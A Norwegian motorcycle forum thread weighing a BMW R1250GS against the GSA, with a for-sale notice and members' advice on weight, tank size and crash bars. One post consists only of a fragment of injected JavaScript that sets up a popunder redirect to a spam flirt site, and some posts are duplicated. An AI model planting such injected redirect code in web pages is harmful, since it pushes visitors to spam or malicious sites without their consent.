Hei folkens
Det blir gjort bestilling (avtale er i boks.) av helt ny sykkel på Tirsdag, men da er valgets kval mellom GS eller GSA.
Litt opptatt av vekt da GS er tung nok ved stillestående og turpakket. Mitt høyre kne er litt svakt i enkelte vinkler, så må
ta noe hensyn til det, men vil allikevel høre hva folket sier.
Fordeler og ulemper og råd mottas.
Rekkevidde på GSA trenger jeg ikke, da alle jeg kjører med må fylle allikevel...
Min superstrøkne 1200GS Rally 2017 er da til salgs om noen får tenning rimelig raskt. (man vet jo aldri.)
Alt utstyr du får kjøpt + litt til. GSA koffertsett. Km.st. kun 23.500 og helt ny service nå!.
Dette ER en 100% strøken sykkel.
Valgets kval med BMW GS eller GSA
-
- Innlegg: 981
- Registrert: 21 mai 2020, 21:02
- Motorsykkelen din: Honda Forza 350
Re: Valgets kval med BMW GS eller GSA
Mesteparten av vektforskjellen mellom GS og GSA kommer jo fra større tank og forhåndsmontert fallbeskyttelse. Men hvis du uansett skal montere fallbeskyttelse på en ny GS sykkel utgjør det ingen stor forskjell.
Så da er det jo i praksis kun forskjell på gaffel/dempervandring som står igjen, trenger du det lille ekstra GSA gir? Samt at forbremsen fungerer bedre stående på GSA.
Så hvis du har tenkt å kjøre offroad med den er vel GSA best. Hvis den holder seg på veien og ikke trenger ekstra fallbeskyttelse, GS.
Så da er det jo i praksis kun forskjell på gaffel/dempervandring som står igjen, trenger du det lille ekstra GSA gir? Samt at forbremsen fungerer bedre stående på GSA.
Så hvis du har tenkt å kjøre offroad med den er vel GSA best. Hvis den holder seg på veien og ikke trenger ekstra fallbeskyttelse, GS.
Re: Valgets kval med BMW GS eller GSA
Jeg vurderte også både vanlig GS og GSA, og valgte til slutt GSA da jeg for det meste kjører langturer og den virket å være den mest komplette mc for mitt bruk. GSA er stor og massiv når du skal parkere på trange plasser, men når den først begynne å rulle så merkes ikke vekta. Når du er vant med vanlig GS så tror jeg ikke en GSA vil oppleves vesentlig tyngre. Uansett er det lurt å prøve begge før du bestemmer deg, lykke til
Sent from my iPhone using Tapatalk
Sent from my iPhone using Tapatalk
Re: Valgets kval med BMW GS eller GSA
Helt klart GSA
dypen
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2
- FredrikE24
- Innlegg: 4748
- Registrert: 24 apr 2016, 18:53
- Motorsykkelen din: BMW K1200RS
- Sted: Nordre Follo
Re: Valgets kval med BMW GS eller GSA
Jeg hadde nok gått for en vanlig GS. GSA er faktisk litt i overkant klatrestativ.
Her er det nok mange som er uenig, jeg synes R1250GS er finest i klassen.
Her er det nok mange som er uenig, jeg synes R1250GS er finest i klassen.
- haakeik
- Innlegg: 719
- Registrert: 17 mar 2016, 08:11
- Motorsykkelen din: 2013 Moto Guzzi Stelvio NTX 1200
- Sted: Asker området
Re: Valgets kval med BMW GS eller GSA
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Re: Valgets kval med BMW GS eller GSA
Oh.. Valgets kvaler.... ! Jeg har hatt 1200 GS. Det har du også, du vet hva den er og kjenner sykkelen, bunnsolid. Om jeg hadde valget så ville jeg prøvd GSA som noe nytt i opplevelsen. Tror ikke du får lasta noe mer på den vektfordelingsmessig med tanke på vonde kne. Den vil du kjenne på om du laster GS også. Litt sånn tar du den så tar du den.
-
- Innlegg: 70
- Registrert: 30 des 2019, 21:59
- Motorsykkelen din: Honda XL 700 V Transalp 2009-modell
- Sted: Sandnes
Re: Valgets kval med BMW GS eller GSA
Hei Erik. Hvis du ikke har bruk for GSA-ens enorme tankkapasitet kan jeg ikke skjønne annet enn at standard GS er det beste valget. Lettere, mer agil og mindre ruvende er uvurderlige fordeler ved hverdagsbruk. En del rimeligere er den jo også.
Re: Valgets kval med BMW GS eller GSA
Står mellom samme valg om de ikke er utsolgt i pr når jeg evt skal bestille. Er første sykkel, så jeg vil ha på veltebøyler. Da ender vekt og pris på det samme. Men heller litt mot GS grunnet andre fargemuligheter